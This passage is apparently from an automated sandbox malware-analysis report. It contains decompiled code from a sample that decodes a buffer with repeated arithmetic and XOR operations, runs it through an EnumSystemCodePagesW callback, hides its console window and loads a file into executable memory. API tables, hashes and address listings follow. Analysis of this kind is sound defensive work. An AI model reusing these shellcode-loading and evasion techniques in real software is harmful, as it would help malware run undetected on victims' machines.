						 *(_v12 + _v8) =  *(_v12 + _v8) - 0x68;
						 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
						 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
						 *(_v12 + _v8) =  *(_v12 + _v8) + 0x6f;
						 *(_v12 + _v8) =  *(_v12 + _v8) - 0x28;
						 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
						 *(_v12 + _v8) =  *(_v12 + _v8) - 0xc6;
						 *(_v12 + _v8) =  *(_v12 + _v8) + 0xf5;
						 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
						 *(_v12 + _v8) =  *(_v12 + _v8) - 0xf8;
						 *(_v12 + _v8) =  *(_v12 + _v8) ^ 0x0000002e;
						 *(_v12 + _v8) =  *(_v12 + _v8) + 0x56;
						 *(_v12 + _v8) =  *(_v12 + _v8) ^ 0x0000006d;
						 *(_v12 + _v8) =  *(_v12 + _v8) - 0x50;
						 *(_v12 + _v8) =  *(_v12 + _v8) ^ 0x00000097;
						_v8 = _v8 + 1;
						__eflags = _v8 - _v112;
						if(_v8 >= _v112) {
							break;
						}
					}
					EnumSystemCodePagesW(_v12, 0); // executed
					E0040DBEB(_v32);
					_t649 = _t648 + 4;
					_v8 = 0;
					while(1) {
						__eflags = _v8 - _a4;
						if(_v8 >= _a4) {
							break;
						}
						 *0x41feac = 0x1f7;
						_t644 = _v8 + 1;
						__eflags = _t644;
						_v8 = _t644;
					}
					 *0x41ff4c = GetOEMCP();
					_t518 =  *0x41ff4c; // 0x0
					 *0x41ff48 = _t518;
					 *0x41ff38 = 0x32;
					_push(4);
					_t600 =  *0x41ff38; // 0x0
					_push(_t600);
					_t402 = E0040DBE0();
					_t650 = _t649 + 8;
					 *0x41ff34 = _t402;
					__eflags =  *0x41ff34;
					if( *0x41ff34 != 0) {
						_v8 = 1;
						while(1) {
							L13:
							__eflags = _v8 - _a4;
							if(_v8 >= _a4) {
								break;
							}
							_v44 = L"--headless";
							_v36 =  *((intOrPtr*)(_a8 + _v8 * 4));
							while(1) {
								_t611 = _v36;
								_t423 =  *_t611;
								_v100 = _t423;
								__eflags = _t423 -  *_v44;
								if(_t423 !=  *_v44) {
									break;
								}
								__eflags = _v100;
								if(_v100 == 0) {
									L19:
									_v124 = 0;
									L21:
									_v156 = _v124;
									__eflags = _v156;
									if(_v156 != 0) {
										_v52 = L"--unix";
										_v48 =  *((intOrPtr*)(_a8 + _v8 * 4));
										while(1) {
											_t528 = _v48;
											_t614 =  *_t528;
											_v104 = _t614;
											__eflags = _t614 -  *_v52;
											if(_t614 !=  *_v52) {
												break;
											}
											__eflags = _v104;
											if(_v104 == 0) {
												L28:
												_v128 = 0;
												L30:
												_v160 = _v128;
												__eflags = _v160;
												if(_v160 != 0) {
													_v60 = L"--width";
													_v56 =  *((intOrPtr*)(_a8 + _v8 * 4));
													while(1) {
														_t428 = _v56;
														_t531 =  *_t428;
														_v82 = _t531;
														__eflags = _t531 -  *_v60;
														if(_t531 !=  *_v60) {
															break;
														}
														__eflags = _v82;
														if(_v82 == 0) {
															L37:
															_v132 = 0;
															L39:
															_v164 = _v132;
															__eflags = _v164;
															if(_v164 != 0) {
																_v40 = L"--height";
																_v64 =  *((intOrPtr*)(_a8 + _v8 * 4));
																while(1) {
																	_t534 = _v64;
																	_t619 =  *_t534;
																	_v98 = _t619;
																	__eflags = _t619 -  *_v40;
																	if(_t619 !=  *_v40) {
																		break;
																	}
																	__eflags = _v98;
																	if(_v98 == 0) {
																		L53:
																		_v136 = 0;
																		L55:
																		_v168 = _v136;
																		__eflags = _v168;
																		if(_v168 != 0) {
																			_v72 = L"--signal";
																			_v68 =  *((intOrPtr*)(_a8 + _v8 * 4));
																			while(1) {
																				_t622 = _v68;
																				_t433 =  *_t622;
																				_v88 = _t433;
																				__eflags = _t433 -  *_v72;
																				if(_t433 !=  *_v72) {
																					break;
																				}
																				__eflags = _v88;
																				if(_v88 == 0) {
																					L69:
																					_v140 = 0;
																					L71:
																					_v172 = _v140;
																					__eflags = _v172;
																					if(_v172 != 0) {
																						_v80 = L"--server";
																						_v76 =  *((intOrPtr*)(_a8 + _v8 * 4));
																						while(1) {
																							_t436 = _v76;
																							_t539 =  *_t436;
																							_v92 = _t539;
																							__eflags = _t539 -  *_v80;
																							if(_t539 !=  *_v80) {
																								break;
																							}
																							__eflags = _v92;
																							if(_v92 == 0) {
																								L82:
																								_v144 = 0;
																								L84:
																								_v176 = _v144;
																								__eflags = _v176;
																								if(_v176 != 0) {
																									return 1;
																								}
																								_v8 = _v8 + 1;
																								__eflags = _v8 - _a4;
																								if(_v8 != _a4) {
																									_t441 = E0040E35E( *((intOrPtr*)(_a8 + _v8 * 4)),  *((intOrPtr*)(_a8 + _v8 * 4)),  &_v16, 0);
																									_t650 = _t650 + 0xc;
																									 *0x41fea8 = _t441;
																									__eflags =  *_v16 & 0x0000ffff;
																									if(( *_v16 & 0x0000ffff) == 0) {
																										L12:
																										_t444 = _v8 + 1;
																										__eflags = _t444;
																										_v8 = _t444;
																										goto L13;
																									}
																									return 1;
																								}
																								return 1;
																							}
																							_t436 = _v76;
																							_t543 =  *((intOrPtr*)(_t436 + 2));
																							_v94 = _t543;
																							_t296 =  &(_v80[2]); // 0x73002d
																							__eflags = _t543 -  *_t296;
																							if(_t543 !=  *_t296) {
																								break;
																							}
																							_v76 = _v76 + 4;
																							_v80 =  &(_v80[4]);
																							__eflags = _v94;
																							if(_v94 != 0) {
																								continue;
																							}
																							goto L82;
																						}
																						asm("sbb eax, eax");
																						_t437 = _t436 | 0x00000001;
																						__eflags = _t437;
																						_v144 = _t437;
																						goto L84;
																					}
																					_v8 = _v8 + 1;
																					__eflags = _v8 - _a4;
																					if(_v8 != _a4) {
																						_t449 = E0040E35E(_v8,  *((intOrPtr*)(_a8 + _v8 * 4)),  &_v16, 0);
																						_t650 = _t650 + 0xc;
																						_v152 = _t449;
																						__eflags =  *_v16 & 0x0000ffff;
																						if(( *_v16 & 0x0000ffff) == 0) {
																							goto L12;
																						}
																						return 1;
																					}
																					return 1;
																				}
																				_t622 = _v68;
																				_t452 =  *((intOrPtr*)(_t622 + 2));
																				_v90 = _t452;
																				_t260 =  &(_v72[2]); // 0x73002d
																				__eflags = _t452 -  *_t260;
																				if(_t452 !=  *_t260) {
																					break;
																				}
																				_v68 = _v68 + 4;
																				_v72 =  &(_v72[4]);
																				__eflags = _v90;
																				if(_v90 != 0) {
																					continue;
																				}
																				goto L69;
																			}
																			asm("sbb edx, edx");
																			_t623 = _t622 | 0x00000001;
																			__eflags = _t623;
																			_v140 = _t623;
																			goto L71;
																		}
																		_v8 = _v8 + 1;
																		__eflags = _v8 - _a4;
																		if(_v8 != _a4) {
																			_t456 = E0040E35E(_a8,  *((intOrPtr*)(_a8 + _v8 * 4)),  &_v16, 0);
																			_t650 = _t650 + 0xc;
																			_v20 = _t456;
																			__eflags = _v20;
																			if(_v20 != 0) {
																				L60:
																				__eflags = _v20 - 0xffff;
																				if(_v20 > 0xffff) {
																					L62:
																					return 1;
																				}
																				__eflags =  *_v16 & 0x0000ffff;
																				if(( *_v16 & 0x0000ffff) == 0) {
																					goto L12;
																				}
																				goto L62;
																			}
																			__eflags =  *0x41feb4;
																			if( *0x41feb4 == 0) {
																				goto L62;
																			}
																			goto L60;
																		}
																		return 1;
																	}
																	_t534 = _v64;
																	_t636 =  *((intOrPtr*)(_t534 + 2));
																	_v86 = _t636;
																	_t222 =  &(_v40[2]); // 0x68002d
																	__eflags = _t636 -  *_t222;
																	if(_t636 !=  *_t222) {
																		break;
																	}
																	_v64 = _v64 + 4;
																	_v40 =  &(_v40[4]);
																	__eflags = _v86;
																	if(_v86 != 0) {
																		continue;
																	}
																	goto L53;
																}
																asm("sbb ecx, ecx");
																_t535 = _t534 | 0x00000001;
																__eflags = _t535;
																_v136 = _t535;
																goto L55;
															}
															_v8 = _v8 + 1;
															__eflags = _v8 - _a4;
															if(_v8 != _a4) {
																_t463 = E0040E35E( *((intOrPtr*)(_a8 + _v8 * 4)),  *((intOrPtr*)(_a8 + _v8 * 4)),  &_v16, 0);
																_t650 = _t650 + 0xc;
																_v24 = _t463;
																__eflags = _v24;
																if(_v24 != 0) {
																	L44:
																	__eflags = _v24 - 0xffff;
																	if(_v24 > 0xffff) {
																		L46:
																		return 1;
																	}
																	__eflags =  *_v16 & 0x0000ffff;
																	if(( *_v16 & 0x0000ffff) == 0) {
																		goto L12;
																	}
																	goto L46;
																}
																__eflags =  *0x41feb4;
																if( *0x41feb4 == 0) {
																	goto L46;
																}
																goto L44;
															}
															return 1;
														}
														_t428 = _v56;
														_t554 =  *((intOrPtr*)(_t428 + 2));
														_v84 = _t554;
														_t184 =  &(_v60[2]); // 0x77002d
														__eflags = _t554 -  *_t184;
														if(_t554 !=  *_t184) {
															break;
														}
														_v56 = _v56 + 4;
														_v60 =  &(_v60[4]);
														__eflags = _v84;
														if(_v84 != 0) {
															continue;
														}
														goto L37;
													}
													asm("sbb eax, eax");
													_t429 = _t428 | 0x00000001;
													__eflags = _t429;
													_v132 = _t429;
													goto L39;
												}
												 *0x41feb4 = 1;
												 *0x41feb8 = 1;
												_v116 = 1;
												goto L12;
											}
											_t528 = _v48;
											_t642 =  *((intOrPtr*)(_t528 + 2));
											_v106 = _t642;
											_t158 =  &(_v52[2]); // 0x75002d
											__eflags = _t642 -  *_t158;
											if(_t642 !=  *_t158) {
												break;
											}
											_v48 = _v48 + 4;
											_v52 =  &(_v52[4]);
											__eflags = _v106;
											if(_v106 != 0) {
												continue;
											}
											goto L28;
										}
										asm("sbb ecx, ecx");
										_t529 = _t528 | 0x00000001;
										__eflags = _t529;
										_v128 = _t529;
										goto L30;
									}
									_v116 = 1;
									goto L12;
								}
								_t611 = _v36;
								_t468 =  *((intOrPtr*)(_t611 + 2));
								_v102 = _t468;
								_t132 =  &(_v44[2]); // 0x68002d
								__eflags = _t468 -  *_t132;
								if(_t468 !=  *_t132) {
									break;
								}
								_v36 = _v36 + 4;
								_v44 =  &(_v44[4]);
								__eflags = _v102;
								if(_v102 != 0) {
									continue;
								}
								goto L19;
							}
							asm("sbb edx, edx");
							_t612 = _t611 | 0x00000001;
							__eflags = _t612;
							_v124 = _t612;
							goto L21;
						}
						__eflags =  *0x41fea8;
						if( *0x41fea8 != 0) {
							__eflags = _v24;
							if(_v24 == 0) {
								_v24 = 0x50;
							}
							__eflags = _v20;
							if(__eflags == 0) {
								_v20 = 0x96;
							}
							_t520 = _v20;
							 *0x41feb0 = E00402960(_v20, __eflags, 0x41fea8, 1, _v24, _v20);
							__eflags =  *0x41feb0;
							if( *0x41feb0 != 0) {
								__eflags = _v116;
								if(_v116 == 0) {
									_t404 = E004046F0(_t645, 0x41fea8);
									__eflags = _t404;
									if(_t404 != 0) {
										GetStartupInfoW( &_v260);
										_v28 = _v260.lpTitle;
										_t603 = _v28 + 2;
										__eflags = _t603;
										_v180 = _t603;
										do {
											_v96 =  *_v28;
											_v28 = _v28 + 2;
											__eflags = _v96;
										} while (_v96 != 0);
										_v184 = _v28 - _v180 >> 1;
										E00406640(0x41fea8, _v260.lpTitle, _v184 << 1);
										__eflags = _v260.dwFlags & 0x00000001;
										if((_v260.dwFlags & 0x00000001) == 0) {
											_v148 = 5;
										} else {
											_v148 = _v260.wShowWindow & 0x0000ffff;
										}
										_t609 =  *0x41ff50; // 0x0
										ShowWindow(_t609, _v148);
										L116:
										return E00404CA0(0x41fea8, _v152);
									}
									return 1;
								}
								 *0x41ff58 = GetStdHandle(0xfffffff6);
								 *0x41ff5c = GetStdHandle(0xfffffff5);
								__eflags =  *0x41ff58;
								if( *0x41ff58 != 0) {
									L102:
									E00404690(0x41fea8);
									__eflags =  *0x41feb4;
									if( *0x41feb4 != 0) {
										L105:
										L107:
										goto L116;
									}
									_t418 = E004034E0(_t520, 0x41fea8);
									__eflags = _t418;
									if(_t418 != 0) {
										goto L105;
									}
									return 1;
								}
								__eflags =  *0x41ff5c;
								if( *0x41ff5c == 0) {
									 *0x41febc = 1;
									goto L107;
								}
								goto L102;
							} else {
								return 1;
							}
						}
						return 1;
					}
					return 1;
				}
				return 0;
			}






































































































                                                  0x00409720
                                                  0x00409729
                                                  0x00409730
                                                  0x00409737
                                                  0x0040973e
                                                  0x00409748
                                                  0x00409752
                                                  0x00409759
                                                  0x00409762
                                                  0x00409769
                                                  0x0040976f
                                                  0x00409774
                                                  0x00409779
                                                  0x0040977c
                                                  0x00409783
                                                  0x00409797
                                                  0x0040979c
                                                  0x004097b6
                                                  0x004097c0
                                                  0x004097c6
                                                  0x004097d5
                                                  0x004097e5
                                                  0x004097eb
                                                  0x00409803
                                                  0x00409809
                                                  0x0040981a
                                                  0x0040982d
                                                  0x00409840
                                                  0x00409853
                                                  0x0040986a
                                                  0x0040987e
                                                  0x00409891
                                                  0x004098a4
                                                  0x004098b8
                                                  0x004098cc
                                                  0x004098df
                                                  0x004098f6
                                                  0x0040990d
                                                  0x00409921
                                                  0x00409938
                                                  0x0040994c
                                                  0x00409960
                                                  0x00409974
                                                  0x00409988
                                                  0x0040999f
                                                  0x004099a7
                                                  0x004099ad
                                                  0x004099b0
                                                  0x00000000
                                                  0x00000000
                                                  0x004099b2
                                                  0x004099bd
                                                  0x004099c7
                                                  0x004099cc
                                                  0x004099cf
                                                  0x004099e1
                                                  0x004099e4
                                                  0x004099e7
                                                  0x00000000
                                                  0x00000000
                                                  0x004099e9
                                                  0x004099db
                                                  0x004099db
                                                  0x004099de
                                                  0x004099de
                                                  0x004099fb
                                                  0x00409a00
                                                  0x00409a06
                                                  0x00409a0c
                                                  0x00409a16
                                                  0x00409a18
                                                  0x00409a1e
                                                  0x00409a1f
                                                  0x00409a24
                                                  0x00409a27
                                                  0x00409a2c
                                                  0x00409a33
                                                  0x00409a3f
                                                  0x00409a51
                                                  0x00409a51
                                                  0x00409a54
                                                  0x00409a57
                                                  0x00000000
                                                  0x00000000
                                                  0x00409a5d
                                                  0x00409a6d
                                                  0x00409a70
                                                  0x00409a70
                                                  0x00409a73
                                                  0x00409a76
                                                  0x00409a7d
                                                  0x00409a80
                                                  0x00000000
                                                  0x00000000
                                                  0x00409a82
                                                  0x00409a87
                                                  0x00409aac
                                                  0x00409aac
                                                  0x00409abd
                                                  0x00409ac0
                                                  0x00409ac6
                                                  0x00409acd
                                                  0x00409adb
                                                  0x00409aeb
                                                  0x00409aee
                                                  0x00409aee
                                                  0x00409af1
                                                  0x00409af4
                                                  0x00409afb
                                                  0x00409afe
                                                  0x00000000
                                                  0x00000000
                                                  0x00409b00
                                                  0x00409b05
                                                  0x00409b2a
                                                  0x00409b2a
                                                  0x00409b3b
                                                  0x00409b3e
                                                  0x00409b44
                                                  0x00409b4b
                                                  0x00409b6d
                                                  0x00409b7d
                                                  0x00409b80
                                                  0x00409b80
                                                  0x00409b83
                                                  0x00409b86
                                                  0x00409b8d
                                                  0x00409b90
                                                  0x00000000
                                                  0x00000000
                                                  0x00409b92
                                                  0x00409b97
                                                  0x00409bbc
                                                  0x00409bbc
                                                  0x00409bcd
                                                  0x00409bd0
                                                  0x00409bd6
                                                  0x00409bdd
                                                  0x00409c46
                                                  0x00409c56
                                                  0x00409c59
                                                  0x00409c59
                                                  0x00409c5c
                                                  0x00409c5f
                                                  0x00409c66
                                                  0x00409c69
                                                  0x00000000
                                                  0x00000000
                                                  0x00409c6b
                                                  0x00409c70
                                                  0x00409c95
                                                  0x00409c95
                                                  0x00409cac
                                                  0x00409cb2
                                                  0x00409cb8
                                                  0x00409cbf
                                                  0x00409d28
                                                  0x00409d38
                                                  0x00409d3b
                                                  0x00409d3b
                                                  0x00409d3e
                                                  0x00409d41
                                                  0x00409d48
                                                  0x00409d4b
                                                  0x00000000
                                                  0x00000000
                                                  0x00409d4d
                                                  0x00409d52
                                                  0x00409d77
                                                  0x00409d77
                                                  0x00409d8e
                                                  0x00409d94
                                                  0x00409d9a
                                                  0x00409da1
                                                  0x00409df5
                                                  0x00409e05
                                                  0x00409e08
                                                  0x00409e08
                                                  0x00409e0b
                                                  0x00409e0e
                                                  0x00409e15
                                                  0x00409e18
                                                  0x00000000
                                                  0x00000000
                                                  0x00409e1a
                                                  0x00409e1f
                                                  0x00409e44
                                                  0x00409e44
                                                  0x00409e5b
                                                  0x00409e61
                                                  0x00409e67
                                                  0x00409e6e
                                                  0x00000000
                                                  0x00409ec1
                                                  0x00409e76
                                                  0x00409e7c
                                                  0x00409e7f
                                                  0x00409e9b
                                                  0x00409ea0
                                                  0x00409ea3
                                                  0x00409eae
                                                  0x00409eb0
                                                  0x00409a48
                                                  0x00409a4b
                                                  0x00409a4b
                                                  0x00409a4e
                                                  0x00000000
                                                  0x00409a4e
                                                  0x00000000
                                                  0x00409eb2
                                                  0x00000000
                                                  0x00409e81
                                                  0x00409e21
                                                  0x00409e24
                                                  0x00409e28
                                                  0x00409e2f
                                                  0x00409e2f
                                                  0x00409e33
                                                  0x00000000
                                                  0x00000000
                                                  0x00409e35
                                                  0x00409e39
                                                  0x00409e3d
                                                  0x00409e42
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409e42
                                                  0x00409e50
                                                  0x00409e52
                                                  0x00409e52
                                                  0x00409e55
                                                  0x00000000
                                                  0x00409e55
                                                  0x00409da9
                                                  0x00409daf
                                                  0x00409db2
                                                  0x00409dce
                                                  0x00409dd3
                                                  0x00409dd6
                                                  0x00409de2
                                                  0x00409de4
                                                  0x00000000
                                                  0x00409df0
                                                  0x00000000
                                                  0x00409de6
                                                  0x00000000
                                                  0x00409db4
                                                  0x00409d54
                                                  0x00409d57
                                                  0x00409d5b
                                                  0x00409d62
                                                  0x00409d62
                                                  0x00409d66
                                                  0x00000000
                                                  0x00000000
                                                  0x00409d68
                                                  0x00409d6c
                                                  0x00409d70
                                                  0x00409d75
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409d75
                                                  0x00409d83
                                                  0x00409d85
                                                  0x00409d85
                                                  0x00409d88
                                                  0x00000000
                                                  0x00409d88
                                                  0x00409cc7
                                                  0x00409ccd
                                                  0x00409cd0
                                                  0x00409cec
                                                  0x00409cf1
                                                  0x00409cf4
                                                  0x00409cf7
                                                  0x00409cfb
                                                  0x00409d06
                                                  0x00409d06
                                                  0x00409d0d
                                                  0x00409d19
                                                  0x00000000
                                                  0x00409d19
                                                  0x00409d15
                                                  0x00409d17
                                                  0x00000000
                                                  0x00409d23
                                                  0x00000000
                                                  0x00409d17
                                                  0x00409cfd
                                                  0x00409d04
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409d04
                                                  0x00000000
                                                  0x00409cd2
                                                  0x00409c72
                                                  0x00409c75
                                                  0x00409c79
                                                  0x00409c80
                                                  0x00409c80
                                                  0x00409c84
                                                  0x00000000
                                                  0x00000000
                                                  0x00409c86
                                                  0x00409c8a
                                                  0x00409c8e
                                                  0x00409c93
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409c93
                                                  0x00409ca1
                                                  0x00409ca3
                                                  0x00409ca3
                                                  0x00409ca6
                                                  0x00000000
                                                  0x00409ca6
                                                  0x00409be5
                                                  0x00409beb
                                                  0x00409bee
                                                  0x00409c0a
                                                  0x00409c0f
                                                  0x00409c12
                                                  0x00409c15
                                                  0x00409c19
                                                  0x00409c24
                                                  0x00409c24
                                                  0x00409c2b
                                                  0x00409c37
                                                  0x00000000
                                                  0x00409c37
                                                  0x00409c33
                                                  0x00409c35
                                                  0x00000000
                                                  0x00409c41
                                                  0x00000000
                                                  0x00409c35
                                                  0x00409c1b
                                                  0x00409c22
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409c22
                                                  0x00000000
                                                  0x00409bf0
                                                  0x00409b99
                                                  0x00409b9c
                                                  0x00409ba0
                                                  0x00409ba7
                                                  0x00409ba7
                                                  0x00409bab
                                                  0x00000000
                                                  0x00000000
                                                  0x00409bad
                                                  0x00409bb1
                                                  0x00409bb5
                                                  0x00409bba
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409bba
                                                  0x00409bc5
                                                  0x00409bc7
                                                  0x00409bc7
                                                  0x00409bca
                                                  0x00000000
                                                  0x00409bca
                                                  0x00409b4d
                                                  0x00409b57
                                                  0x00409b61
                                                  0x00000000
                                                  0x00409b61
                                                  0x00409b07
                                                  0x00409b0a
                                                  0x00409b0e
                                                  0x00409b15
                                                  0x00409b15
                                                  0x00409b19
                                                  0x00000000
                                                  0x00000000
                                                  0x00409b1b
                                                  0x00409b1f
                                                  0x00409b23
                                                  0x00409b28
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409b28
                                                  0x00409b33
                                                  0x00409b35
                                                  0x00409b35
                                                  0x00409b38
                                                  0x00000000
                                                  0x00409b38
                                                  0x00409acf
                                                  0x00000000
                                                  0x00409acf
                                                  0x00409a89
                                                  0x00409a8c
                                                  0x00409a90
                                                  0x00409a97
                                                  0x00409a97
                                                  0x00409a9b
                                                  0x00000000
                                                  0x00000000
                                                  0x00409a9d
                                                  0x00409aa1
                                                  0x00409aa5
                                                  0x00409aaa
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409aaa
                                                  0x00409ab5
                                                  0x00409ab7
                                                  0x00409ab7
                                                  0x00409aba
                                                  0x00000000
                                                  0x00409aba
                                                  0x00409ed0
                                                  0x00409ed7
                                                  0x00409ee3
                                                  0x00409ee7
                                                  0x00409ee9
                                                  0x00409ee9
                                                  0x00409ef0
                                                  0x00409ef4
                                                  0x00409ef6
                                                  0x00409ef6
                                                  0x00409efd
                                                  0x00409f11
                                                  0x00409f16
                                                  0x00409f1d
                                                  0x00409f29
                                                  0x00409f2d
                                                  0x00409f9c
                                                  0x00409fa1
                                                  0x00409fa3
                                                  0x00409fb6
                                                  0x00409fc2
                                                  0x00409fc8
                                                  0x00409fc8
                                                  0x00409fcb
                                                  0x00409fd1
                                                  0x00409fd7
                                                  0x00409fdb
                                                  0x00409fdf
                                                  0x00409fdf
                                                  0x00409ff1
                                                  0x0040a00c
                                                  0x0040a017
                                                  0x0040a01a
                                                  0x0040a02b
                                                  0x0040a01c
                                                  0x0040a023
                                                  0x0040a023
                                                  0x0040a03c
                                                  0x0040a043
                                                  0x0040a049
                                                  0x00000000
                                                  0x0040a055
                                                  0x00000000
                                                  0x00409fa5
                                                  0x00409f37
                                                  0x00409f44
                                                  0x00409f49
                                                  0x00409f50
                                                  0x00409f5b
                                                  0x00409f60
                                                  0x00409f65
                                                  0x00409f6c
                                                  0x00409f86
                                                  0x00409f92
                                                  0x00000000
                                                  0x00409f92
                                                  0x00409f73
                                                  0x00409f78
                                                  0x00409f7a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409f7c
                                                  0x00409f52
                                                  0x00409f59
                                                  0x00409f88
                                                  0x00000000
                                                  0x00409f88
                                                  0x00000000
                                                  0x00409f1f
                                                  0x00000000
                                                  0x00409f1f
                                                  0x00409f1d
                                                  0x00000000
                                                  0x00409ed9
                                                  0x00000000
                                                  0x00409a35
                                                  0x00000000

                                                  APIs
                                                  • GetConsoleWindow.KERNELBASE(00000000), ref: 00409762
                                                  • ShowWindow.USER32(00000000), ref: 00409769
                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004097C0
                                                  • GetFileSize.KERNEL32(?,00000000), ref: 004097CF
                                                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 004097E5
                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00409803
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: File$Window$AllocConsoleCreateReadShowSizeVirtual
                                                  • String ID: P
                                                  • API String ID: 3075330158-3110715001
                                                  • Opcode ID: 9350dc32ad85247776eb7766d296cb9668ab8607546fc5f0d0b9a7cb4b47a0c2
                                                  • Instruction ID: 31952e796c7ddf8e068097985c5af672fbe9e1e17c7b6cd70b4dec0f663d8c1b
                                                  • Opcode Fuzzy Hash: 9350dc32ad85247776eb7766d296cb9668ab8607546fc5f0d0b9a7cb4b47a0c2
                                                  • Instruction Fuzzy Hash: BA621874904208DFDB14CFA8C884BEEBBB1FF45308F2480AAD5056B392D7796E85DB59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B814BE Relevance: 10.7, APIs: 7, Instructions: 192filememoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 194 b814be-b81591 call b80005 call b800e4 * 7 call b80019 CreateFileW 213 b81673 194->213 214 b81597-b815a2 194->214 216 b81677-b8167f 213->216 217 b815a8-b815b8 VirtualAlloc 214->217 218 b8166f-b81671 214->218 222 b81699-b8169d 216->222 217->218 219 b815be-b815cd ReadFile 217->219 218->213 218->216 219->218 221 b815d3-b815f4 VirtualAlloc 219->221 225 b8166c 221->225 226 b815f6-b81609 call b800b5 221->226 223 b8169f-b816a4 222->223 224 b81681-b81686 222->224 227 b816b1-b816b7 223->227 228 b816a6-b816ae VirtualFree 223->228 230 b81688-b8168d 224->230 231 b8168f-b81691 224->231 225->218 235 b8160b-b81614 226->235 236 b81642-b81652 call b800e4 226->236 228->227 230->222 232 b81693-b81695 231->232 233 b81697 231->233 232->222 233->222 238 b81617-b81640 call b800b5 235->238 236->225 241 b81654-b81659 236->241 238->236 243 b8165b-b8165c FindCloseChangeNotification 241->243 244 b8165f-b8166a VirtualFree 241->244 243->244 244->222
                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,00000000,7F91A078,00000000,7F951704,00000000,7FE1F1FB,00000000,7FE7F840,00000000), ref: 00B81587
                                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,00B816D6,7FAB7E30,00B80FA5,00000000,00000040), ref: 00B815B1
                                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,7FAB7E30,00000000,?,?,?,?,?,?,?,00B816D6,7FAB7E30,00B80FA5,00000000), ref: 00B815C8
                                                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,00B816D6,7FAB7E30,00B80FA5,00000000,00000040), ref: 00B815EC
                                                  • FindCloseChangeNotification.KERNELBASE(00000000,00B80B9A,00000000,?,?,?,?,?,?,?,00B816D6,7FAB7E30,00B80FA5,00000000,00000040,?), ref: 00B8165C
                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00B80B9A,00000000,?,?,?,?,?,?,?,00B816D6,7FAB7E30,00B80FA5,00000000), ref: 00B81667
                                                  • VirtualFree.KERNELBASE(00B80B9A,00000000,00008000,?,?,?,?,?,?,?,00B816D6,7FAB7E30,00B80FA5,00000000,00000040,?), ref: 00B816AE
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.311017537.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_b80000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                                  • String ID:
                                                  • API String ID: 656311269-0
                                                  • Opcode ID: bdf57d96a7a8095ddb91817cfd017043a9e57b958dd1ec16a9ec4e4f7a634f08
                                                  • Instruction ID: 54f9215311417cf7c857b2055f02cbf630179877c6c0ee56198348b693971c95
                                                  • Opcode Fuzzy Hash: bdf57d96a7a8095ddb91817cfd017043a9e57b958dd1ec16a9ec4e4f7a634f08
                                                  • Instruction Fuzzy Hash: 79518071E01218ABDB10AFA8CC85FAEB7B9EF15714F14499AF940FB290E7749901CB64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B8091E Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 425processCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
